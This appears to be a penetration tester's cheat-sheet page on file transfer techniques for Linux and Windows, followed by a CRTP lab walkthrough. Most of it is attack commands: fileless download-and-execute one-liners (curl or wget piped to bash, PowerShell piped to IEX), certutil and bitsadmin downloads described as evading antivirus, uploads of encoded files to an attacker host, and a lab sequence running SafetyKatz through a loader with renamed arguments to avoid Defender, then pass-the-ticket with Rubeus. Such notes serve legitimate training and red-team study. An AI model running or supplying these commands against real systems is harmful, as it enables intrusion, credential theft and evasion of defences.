File Transfers

Linux

Servers

# Python3
python3 -m http.server

# Python 2.7
python2.7 -m SimpleHTTPServer

# PHP
php -S 0.0.0.0:8000

# Ruby
ruby -run -ehttpd . -p8000

# Python3 
python3 -m uploadserver

# Netcat
nc -lvnp 1337

An HTTPS server can also be created:

# Create self-signed cert
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Create and move to webroot (must be different dir from the cert)
mkdir https && cd https

# Start web server using the cert
sudo python3 -m uploadserver 443 --server-certificate /root/server.pem

# Upload from the target
curl -X POST https://10.10.10.10/upload -F 'files=@file1' -F 'files=@file1' --insecure

SMB (Server Message Block) is a Windows-native protocol primarily used for file and printer sharing on local networks. It operates at a lower level, allowing direct access to files, directories, and network shares, often integrated into Windows Explorer and supporting authentication, locking, and permissions.

Start a SMB server:

# Unauthenticated [Authenticated]
sudo impacket-smbserver share -smb2support / [-user test -password test]

Connect to the server from the client and transfer the target file:

net use z: \\<SMB-server-IP>\share [/user:test test]

# Transfer
copy <file> z:\

WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP/HTTPS that allows users to manage files on a remote web server. It is more platform-agnostic and works over standard web ports, making it easier to traverse firewalls, but it generally has higher latency and fewer low-level filesystem features compared to SMB.

Start the WebDav server:

# Install libraries
sudo pip install wsgidav cheroot

# Start server
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Browser the share or transfer the target file:

# Browse the share
dir \\<WebDav-server-IP>\DavWWWRoot

# Transfer a file
\Windows\Temp\<FILE> \\<WebDav-server-IP>\DavWWWRoot\

Utilities

Wget is a CLI utility for retrieving files from the web using HTTP, HTTPS, and FTP protocols. It supports recursive downloads, resume capabilities, and background operation. Offensive operators often use wget to fetch binaries or scripts from remote servers because it is widely available on Linux systems and can operate quietly in automated workflows.

wget http://10.10.10.10/nc.exe -O nc.exe

# Fileless execution (-q: quiet mode, -O: specifies the output, -O-: redirects output to stdout)
wget -qO- https://172.16.10.1/script.py | python3

Curl is a CLI tool and library for transferring data with URLs, supporting a wide range of protocols including HTTP, HTTPS, FTP, and SCP. It allows fine-grained control over headers, authentication, and request methods, making it useful for downloading files, interacting with APIs, or exfiltrating data in offensive operations.

curl http://10.10.10.10/script.sh -o /tmp/script.sh

# Fileless execution
curl https://172.16.10.1/script.sh | bash

SCP (Secure Copy) is a CLI utility for securely transferring files between hosts over SSH. It provides encryption for both authentication and data transfer, making it a reliable method to move files across remote systems in penetration testing or red team engagements while maintaining confidentiality and integrity.

scp user@172.16.10.10:/tmp/nc.exe ./nc.exe

/dev/tcp can also be used for fileless execution:

# Connect to the target webserver
exec 3<>/dev/tcp/10.10.10.32/80

# HTTP GET request
echo -e "GET /script.sh HTTP/1.1\n\n">&3

# Print the response
cat <&3

Windows

Servers

Create an SMB share:

# Create a new share
> New-SmbShare -Name "shared" -Path "C:\Users\x7331" -FullAccess "Everyone"

Name   ScopeName Path            Description
----   --------- ----            -----------
shared *         C:\Users\x7331

# Confirm the share is up
> Get-SmbShare

Name   ScopeName Path            Description
----   --------- ----            -----------
ADMIN$ *         C:\Windows      Remote Admin
C$     *         C:\             Default share
IPC$   *                         Remote IPC
shared *         C:\Users\x7331

Access it from the target via File Explorer at \\10.10.10.10\shared.

Downloads

wget http://10.10.10.10/nc.exe -O c:\windows\temp\nc.exe

Bitsadmin is a Windows CLI utility designed to create, manage, and monitor Background Intelligent Transfer Service (BITS) jobs, which are normally used to download or upload files asynchronously with network throttling. Offensive operators leverage bitsadmin to transfer files covertly, as it uses a system service that often bypasses standard firewall and proxy restrictions and avoids immediate antivirus detection.

The /transfer flag specifies that the operation is a transfer job, while n is simply the name assigned to that job for tracking or management purposes.

bitsadmin /transfer n http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe

Certutil is a Windows CLI tool for managing certificates and keys, but it is often abused offensively because it can download files, encode or decode data, and interact with certificate stores while evading most antivirus detections, making it useful for file transfer or malware staging in administrative environments.

The -split flag ensures that large files are split and reassembled correctly during download, preventing corruption. The -f flag forces the operation, overwriting any existing file with the same name without prompting.

certutil.exe -split -f http://10.10.10.10/nc.exe nc.exe

(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file1','c:\temp\file1')

Fileless execution:

(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file1','c:\temp\file1') | IEX

Uploads

# encode file
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:\temp\file1' -Encoding Byte))
# upload file
Invoke-WebRequest -Uri http://10.10.10.10 -Method POST -Body $b64

Misc

b64

# encode file on Windows
[Convert]::ToBase64String((Get-Content -path "c:\temp\file1" -Encoding byte))
# copy the output and decode it on Linux
echo IyBDb3B5...YWxob3N0DQo= | base64 -d > file1

# encode file (-w --> wrap, use 0 to disable line wrapping)
cat file1 | base64 -w 0;echo
# decode on PowerShell
[IO.File]::WriteAllBytes("c:\temp\file1", [Convert]::FromBase64String("LS0tL...0tLQo="))

Linux

# starting an uploadserver
python3 -m uploadserver 
# uploading a file
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("file1","rb")})'

# python2.7
python2.7 -c 'import urllib;urllib.urlretrieve ("https://script.sh", "script.sh")'
# python3
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://script.sh", "script.sh")'

php -r '$file = file_get_contents("https://10.10.10.10/script.sh"); file_put_contents("script.sh",$file);'

php -r 'const BUFFER = 1024; $fremote = 
fopen("https://10.10.10.10/script.sh", "rb"); $flocal = fopen("script.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

perl -e 'use LWP::Simple; getstore("https://10.10.10.10/script.sh", "script.sh");'

Windows

# create a file called `wget.js`
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

# create a file called `wget.vbs`
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

CRTP

Transfer files from the attacking host to a compromised host (dcorp-ci):

iwr http://172.16.100.37/Loader.exe -OutFile c:\users\public\Loader.exe

Copy the file from dcorp-ci to the target host (dcorp-mgmt):

echo F | xcopy c:\users\public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

If we run SafetyKatz via the Loader directly from the webserver, MD will complain about it because it includes an external IP address (attacker's IP):

winrs -r:dcorp-mgmt "cmd /c C:\users\public\Loader.exe -path http://172.16.100.37/SafetyKatz.exe sekurlsa::evasive-keys exit"

A workaround would be to do it via a port forward. Any connection made to dcorp-mgmt port 8080 will be forwarded to the attacker's machine port 80:

The sekurlsa parameter ekeys was renamed to evasive-keys to avoid MD flagging.

# Create a port forward from dcorp-mgmt to the attacker machine
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.37"

# Download and execute binary via localhost
winrs -r:dcorp-mgmt "cmd /c C:\users\public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::evasive-keys exit"

Now we can OtH:

Loader.exe -path Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:c:\windows\system32\cmd.exe /show /ptt

A new shell will spawn in the svcadmin context. This is a remote type 9 login, so the context will show only when accessing a remote host

> klist

Current LogonId is 0:0x6666f8a

Cached Tickets: (1)

#0>     Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        
> whoami
dcorp\student337

> winrs -r:dcorp-dc cmd /c set username
USERNAME=svcadmin

# List running services and as who they run as
>winrs -r:dcorp-mgmt cmd /c wmic service get Name,State,StartName
MSSQLSERVER   dcorp\svcadmin   Running

>winrs -r:dcorp-mgmt cmd /c powershell "Get-WmiObject Win32_Service | Where-Object { $_.StartName -like '*svcadmin*' } | Select Name, StartName, State"


Name        StartName      State
----        ---------      -----
MSSQLSERVER dcorp\svcadmin Running

PreviousShells NextCryptography

Last updated 2 months ago

Was this helpful?